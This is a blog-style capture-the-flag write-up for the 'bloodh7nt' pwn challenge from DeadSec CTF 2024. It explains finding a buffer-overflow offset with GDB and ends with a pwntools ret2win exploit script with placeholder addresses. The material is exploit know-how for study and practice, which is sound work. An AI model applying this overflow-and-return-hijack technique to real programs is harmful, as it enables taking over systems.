buttonmashing

Mashing buttons since 1984
Pwn_bloodh7nt.rar

The binary is a simple 64-bit ELF executable. When run, it simulates a "Blood Hunt" game where you input a name and choose an action. The core of the vulnerability lies in the input handling for the player's name.

The file is a challenge from the pwn category of DeadSec CTF 2024. To solve it, you need to exploit a buffer overflow vulnerability to execute a "ret2win" attack, reached through a specific game mechanic within the binary.

Below is a breakdown of the exploitation process.

To control the program's flow, you first need to find exactly how many bytes are required to reach the return address. You can use GDB with the pwndbg or GEF extension: create a cyclic pattern (e.g., cyclic 100) and input it when prompted for your name. The offset is the position in the pattern of the bytes that end up in the saved return address.

Once you have the offset and the address of the win() function (found via "info functions" in GDB or "nm binary"), you can write a simple Python exploit using the pwntools library:

```python
from pwn import *

# Setup
target = process('./pwn_bloodh7nt')
# target = remote('addr', port)  # For the live challenge

win_addr = 0x40123b  # Replace with the actual address from your analysis
offset = 40          # Replace with your discovered offset

# The payload
# The binary is 64-bit, so we add a 'ret' gadget to keep the stack
# 16-byte aligned before win() makes its system() call
ret_gadget = 0x40101a
payload = b"A" * offset
payload += p64(ret_gadget)
payload += p64(win_addr)

target.sendline(payload)
target.interactive()
```

© 2026 Deep Harbor